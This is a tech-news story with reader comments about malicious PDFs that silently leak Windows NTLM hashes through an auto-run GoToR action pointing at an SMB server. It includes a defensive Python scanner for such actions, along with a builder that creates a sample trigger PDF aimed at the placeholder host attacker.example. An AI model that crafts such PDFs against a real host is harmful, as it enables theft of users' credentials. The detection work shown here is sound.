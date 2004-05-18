Stories

PDF Files Can Silently Leak NTLM Credentials

posted by janrinok on Saturday May 05, @01:51AM
from the not-the-best-best-explanation dept.
Security

MrPlow writes:

Submitted via IRC for SoyCow8317

NT LAN Manager (NTLM) credentials can be stolen via malicious Portable Document Format (PDF) files without user interaction.

PDF files, the security researchers explain, consist primarily of objects, together with document structure, file structure, and content streams. There are eight basic types of objects, including dictionaries, and a malicious actor can abuse these to steal NTLM credentials.

A dictionary object represents a table containing pairs of objects, called entries, where the first element is the key (a name) and the second element is the value (which may be any kind of object). Represented by dictionary objects, the pages of a document are called page objects and consist of required and optional entries.

One of the optional entries is the /AA entry, defining actions performed when a page is opened (/O entry) or closed (/C entry). An action dictionary is held within /O (or /C) and consists of 3 required entries: /S, /F, and /D, describing the type of action to be performed (GoToR, Go To Remote, or GoToE, Go To Embedded), the location of the other PDF, and the location to go to within that document.

"By injecting a malicious entry (using the fields described above together with his SMB server details via the '/F' key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details," Check Point explains.

Source: https://www.securityweek.com/pdf-files-can-silently-leak-ntlm-credentials

Original Submission
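The structure the story describes (a page /AA entry whose /O action is a GoToR with an /F pointing off-host) is concrete enough to scan for. The following is an added example, not part of the story, the SecurityWeek article or Check Point's research: it builds a constructed one-page PDF carrying exactly that action against a placeholder host name (attacker.example, not a real server), then scans raw PDF bytes for GoToR/GoToE actions, and for file specification dictionaries (/FS /URL, /UNC), whose target is a UNC path, a PDF-style //host/share path, or a URL. As a generalization the story does not make, it also reports whether the action sits under /AA /O, /AA /C or the catalog's /OpenAction, which all fire without user interaction. It only sees objects stored uncompressed; objects packed into object streams need a real PDF parser, and the sample file is written without an xref table, which is enough for the scanner but not for a viewer.

```python
import re
import sys

# Innermost << ... >> dictionaries (a match contains no nested dictionary).
DICT_RE = re.compile(rb"<<((?:(?!<<|>>).)*)>>", re.DOTALL)
# The two action types the story names; tolerate "/S/GoToR" and "/S /GoToR".
ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE)\b")
# A file specification dictionary (/FS /URL ..., or a /UNC entry) can carry the target instead.
FILESPEC_RE = re.compile(rb"/(?:FS|UNC)\b")
# /F or /UNC followed by a literal (...) or hex <...> string.
TARGET_RE = re.compile(rb"/(F|UNC)\s*(\((?:[^()\\]|\\.)*\)|<[0-9A-Fa-f\s]*>)", re.DOTALL)
# Text right before the action dictionary: /AA << /O or /C (page open/close),
# or the catalog's /OpenAction. Both run without user interaction.
AUTO_RE = re.compile(rb"(?:/OpenAction\s*|/AA\s*<<\s*/[OC]\s*)$")
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def decode_pdf_string(tok: bytes) -> str:
    """Decode a PDF literal (...) or hex <...> string token to text."""
    if tok.startswith(b"<"):
        return bytes.fromhex(tok[1:-1].decode("ascii")).decode("latin-1")
    body, out, i = tok[1:-1], bytearray(), 0
    while i < len(body):
        c = body[i:i + 1]
        if c != b"\\":
            out += c
            i += 1
            continue
        n = body[i + 1:i + 2]
        if n in ESCAPES:
            out += ESCAPES[n]
            i += 2
        elif n and n in b"01234567":          # \ddd octal escape, up to 3 digits
            j = i + 1
            while j < len(body) and j < i + 4 and body[j:j + 1] in b"01234567":
                j += 1
            out += bytes([int(body[i + 1:j], 8) & 0xFF])
            i = j
        else:                                  # \\ \( \) and any other char: itself
            out += n
            i += 2
    return out.decode("latin-1")


def is_remote(target: str) -> bool:
    """UNC (\\\\host\\share), PDF's platform-neutral //host/share, or any URL scheme."""
    t = target.strip()
    return (t.startswith("\\\\") or t.startswith("//")
            or re.match(r"[A-Za-z][A-Za-z0-9+.-]*://", t) is not None)


def find_remote_actions(pdf: bytes) -> list:
    """One finding per action or file-spec dictionary whose /F or /UNC target leaves the host."""
    findings = []
    for m in DICT_RE.finditer(pdf):
        body = m.group(1)
        action = ACTION_RE.search(body)
        if action is None and FILESPEC_RE.search(body) is None:
            continue                     # neither an action nor a file specification
        for key, tok in TARGET_RE.findall(body):
            target = decode_pdf_string(tok)
            if not is_remote(target):
                continue                 # local file: no SMB/NTLM round trip
            context = pdf[max(0, m.start() - 64):m.start()]
            findings.append({
                "offset": m.start(),
                "action": action.group(1).decode() if action else "FileSpec",
                "key": key.decode(),
                "target": target,
                "auto_trigger": AUTO_RE.search(context) is not None,
            })
    return findings


def build_sample_pdf(target: str = r"\\attacker.example\share\doc.pdf") -> bytes:
    """Constructed one-page PDF whose page /AA /O entry is a GoToR action with /F set
    to `target`. The host name is a placeholder, not a real server. No xref table."""
    # Backslash is the escape character in PDF literal strings, so each one is doubled.
    escaped = target.replace("\\", "\\\\").encode("latin-1")
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
        b"/AA << /O << /S /GoToR /F (" + escaped + b") /D [0 /Fit] >> >> >>",
    ]
    parts = [b"%PDF-1.7\n"]
    for num, obj in enumerate(objects, start=1):
        parts.append(b"%d 0 obj\n%s\nendobj\n" % (num, obj))
    parts.append(b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
    return b"".join(parts)


if __name__ == "__main__":
    # Usage: python scan.py [file.pdf]; with no argument it scans the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pdf()
    for f in find_remote_actions(data):
        print(f"offset {f['offset']}: {f['action']} via /{f['key']} -> {f['target']}"
              f" (auto-trigger: {f['auto_trigger']})")
```

On the sample file the scanner reports one GoToR action via /F targeting the UNC path, flagged as auto-triggering; the same action pointing at a local file name produces no finding, since only an off-host target makes Windows open an SMB session and answer the NTLM challenge.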


«  Saturday, 5 May 2018: Free Comic Book Day

  • (Score: 1, Insightful) by Anonymous Coward on Saturday May 05, @02:13AM (1 child)

    by Anonymous Coward on Saturday May 05, @02:13AM (#675944)

    According to Check Point, the issue likely impacts all PDF-viewers for Windows, as all of them will reveal the NTLM credentials.

    Not surprising that it is Windows, but it's a bit surprising that all PDF viewers reveal the NTLM credentials. TFA doesn't say whether browsers that display PDFs have the same vulnerability.

    The security researchers informed Adobe of the vulnerability, but the company said a fix won't be released, because Microsoft is already offering users the possibility to prevent such attacks from happening in the first place.

    Thanks (for nothing) Adobe. How is Microsoft already offering to prevent these attacks? Is that for all versions of Windows? If it is, then why is this even considered an issue? Something doesn't smell right.

    • (Score: 1, Insightful) by Anonymous Coward on Saturday May 05, @02:22AM

      by Anonymous Coward on Saturday May 05, @02:22AM (#675947)

      Found this MS security article [microsoft.com] stating (emphasis mine):

      Microsoft is releasing an optional security enhancement to NT LAN Manager (NTLM), limiting which network resources various clients in the Windows 10 or the Windows Server 2016 operating systems can use NTLM Single Sign-On (SSO) as an authentication method. When you deploy the new security enhancement with a Network Isolation Policy defining your organization's resources, attackers can no longer redirect a user to a malicious resource outside your organization to obtain the NTLM authentication messages. This new behavior is optional, and requires customers who wish to enable it to opt in via a Windows Registry Setting or other means described below.

      So Adobe is leaving this security vulnerability in place because of an obscure MS option to prevent it.
